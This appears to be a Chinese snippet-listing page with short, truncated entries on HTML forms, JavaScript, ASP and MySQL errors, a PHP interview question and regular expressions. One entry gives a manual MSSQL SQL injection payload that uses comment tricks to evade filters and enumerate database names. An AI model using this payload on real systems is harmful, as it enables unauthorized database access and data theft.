[code]<form>
<label for="check1">经常来这里</label>
<input type="CHECKBOX" id="check1" value="often" name="checkoften">
<label for="check2">偶尔来看看</label>
Tags:
点击 |
文字 |
选中 |
复选框
阅读全文……[code]<SCRIPT LANGUAGE="JavaScript">
<!-- Begin
//www.7gz.cn
var checkflag = "false";
Tags:
按钮 |
选择框 |
全选 |
JS
阅读全文……[code]<html><head>
<title>多彩滚动条</title>
<style>
<!--
Tags:
滚动条 |
色彩 |
编辑器 |
IE5
阅读全文……[code]<body>
<FORM name="form1">
方法1:<input type="file" name="f"><input type=button value=reset onclick="f.outerHTML='<input type=\'file\' name=\'f\'>'">
</FORM>
Tags:
文件 |
上传 |
file |
控件 |
reset
阅读全文……事件源对象
event.srcElement.tagName
event.srcElement.type
捕获释放
event.srcElement.setCapture();
Tags:
JS |
代码 |
大全
阅读全文……问题1:未启用父路径
症状举例:
Server.MapPath() 错误 ASP 0175 : 80004005
不允许的 Path 字符
Tags:
服务器 |
win2003 |
系统 |
常见 |
解答
阅读全文……/**/跟空格的作用一样,有的时候可以过一些过滤爆库语句,修改红色部分的数字挨个猜出库
Quote:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
Tags:
mssql |
手工 |
注入 |
漏洞 |
方法
阅读全文……一、Can't connect to MySQL server on 'localhost' (10061)
翻译:不能连接到 localhost 上的mysql
分析:这说明“localhost”计算机是存在的,但在这台机器上却没提供MySQL服务。
需要启动这台机器上的MySQL服务
如果机子负载太高没空相应请求也会产生这个错误。
Tags:
MYSQL |
数据库 |
问题 |
解决 |
方法
阅读全文……1. Which of the following will not add john to the users array?
a. $users[] = 'john';
b. array_add($users,'john');
c. array_push($users,'john');
d. $users ||= 'john';
Tags:
雅虎 |
php |
面试题
阅读全文……匹配中文字符的正则表达式: [\u4e00-\u9fa5]
匹配双字节字符(包括汉字在内):[^\x00-\xff]
匹配空行的正则表达式:\n[\s| ]*\r
Tags:
正则式 |
常用 |
JS
阅读全文……